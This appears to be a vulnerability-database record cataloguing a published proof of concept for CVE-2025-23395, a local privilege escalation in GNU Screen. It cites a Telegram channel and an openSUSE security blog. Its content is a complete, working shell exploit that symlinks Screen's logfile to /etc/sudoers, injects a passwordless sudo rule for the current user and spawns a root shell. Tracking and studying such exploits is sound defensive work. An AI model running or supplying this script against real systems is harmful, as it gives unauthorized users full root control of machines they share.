{"uuid": "64303a94-7552-4529-be61-4df4a07cd30b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-23395", "type": "published-proof-of-concept", "source": "https://t.me/P0x3k_1N73LL1G3NC3/87", "content": "CVE-2025-23395 Screen LPE exploit\n\n#!/bin/sh\n\nF=$(mktemp)\nL=${HOME}/screen.log\nT=/etc/sudoers\nrm -rf $F $L\nmkfifo $F\nO=$(stat --printf=\"%s\" $T)\necho \"[+] spawning GNU screen\"\nscreen -L -Logfile $L -dmS hax sh -c \"cat $F\"\nwhile [ ! -f $L ]; do sleep 0.1; done\necho \"[+] logfile appeared, doing hax\"\nrm $L\nln -s $T $L\nP=\"${USER} ALL=(ALL) NOPASSWD:ALL\"\n(echo $P; for i in `seq 8192`; do echo; done) > $F\nif [ $(stat --printf=\"%s\" $T) -gt $O ] ; then\n        echo \"[+] bl1ng bl1ng, we got it\"\n        sudo sh\nelse\n        echo \"[-] exploit failed :(\"\nfi\nrm -rf $F $L\n\nBlog: https://security.opensuse.org/2025/05/12/screen-security-issues.html#3a-local-root-exploit-via-logfile_reopen-cve-2025-23395", "creation_timestamp": "2025-05-15T09:24:26.000000Z"}